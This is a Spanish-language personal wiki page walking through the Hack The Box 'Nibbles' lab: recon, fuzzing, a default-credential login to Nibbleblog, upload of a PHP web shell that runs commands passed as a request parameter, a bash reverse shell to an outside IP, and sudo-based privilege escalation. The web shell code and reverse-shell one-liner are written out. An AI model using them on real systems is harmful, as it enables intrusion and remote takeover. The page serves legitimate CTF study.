Notas de Luis

Máquina NIBBLES

Lo primero será hacer los reconocimientos de siempre:

Esto es lo que nos encontramos si accedemos al navegador:

Si miramos el código fuente nos encontramos con esto, diciendo que hay un directorio oculto:

Por tanto vamos a acceder a él:

Y tenemos esto que nos dice powered by nibbleblog:

Por tanto vamos a buscar exploits con searchsploit, donde vemos que hay 2:

También podemos hacer fuzzing en esta nueva dirección tanto con wfuzz como con dirb, y veremos como tenemos varias cosas interesantes, entre ellas un apartado de admin y de content, donde posiblemente podamos acceder posteriormente para ejecutar los archivos maliciosos subidos a la máquina víctima: WFUZZ

Vamos a entrar en admin:

Y en este panel de autenticación podemos probar en utilizar hydra para hacer un ataque de fuerza bruta:2 - Hydra - Ataque de Fuerza Bruta contra panel de login web

Y nos encuentra muchas credenciales:

Pero si probamos alguna de estas, por ejemplo la password lovely, nos va a dar un error porque esta web cuenta con un sistema de protección contra ataques de fuerza bruta:

Por tanto, tendremos que buscar por internet credenciales por defecto en nibbleblog, veremos como el usuario es admin, y luego probamos en la contraseña el nombre de la máquina (nibbles):

Y ya estamos dentro:

Tenemos un apartado de subir archivos (my image), por tanto vamos a subir un php malicioso que nos permita ejecutar comandos remotamente:

Creamos el php malicioso: Consideraciones Previas (Código PHP malicioso para ganar Reverse Shell)

<?php
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>

Lo subimos a la web y después accederemos al archivo dentro del directorio content, que también lo encontramos antes con wfuzz; y tras navegar por los directorios encontramos un archivo image.php que intuimos que es el que subimos:

Una vez subido, en la dirección ponemos ?cmd=whoami y se nos ejecutará este comando:

Ahora que tenemos ejecución remota de comandos, podemos mandarnos una reverse shell, por tanto vamos a url encodear el comando de la reverse shell con burpsuite para que nos funcione correctamente:

bash -c 'bash -i >& /dev/tcp/10.10.16.14/443 0>&1'

Y nos ponemos a escuchar con netcat:

Y pegamos el comando codificado en el navegador:

Y ya tenemos la reverse shell:

Y navegando por los directorios obtenemos la flag:

Ahora para escalar privilegios, si ejecutamos el comando sudo -l, vemos que podemos ejecutar un script que se llama monitor.sh:

Pero vemos que para ejecutar este script tenemos que sacarlo del archivo comprimido de donde se encuentra:

Para sacarlo utilizamos el comando unzip:

Y ahora ya podemos acceder a su interior y llegamos al script:

Ahora vamos a añadir este fragmento de código al script para que al ejecutarlo nos lande una shell como root:

Otorgamos permisos de ejecución:

Lo lanzamos y deberíamos ser root:

computing/hacking/ctf/hackthebox/maquina_nibbles.txt · Última modificación: por 127.0.0.1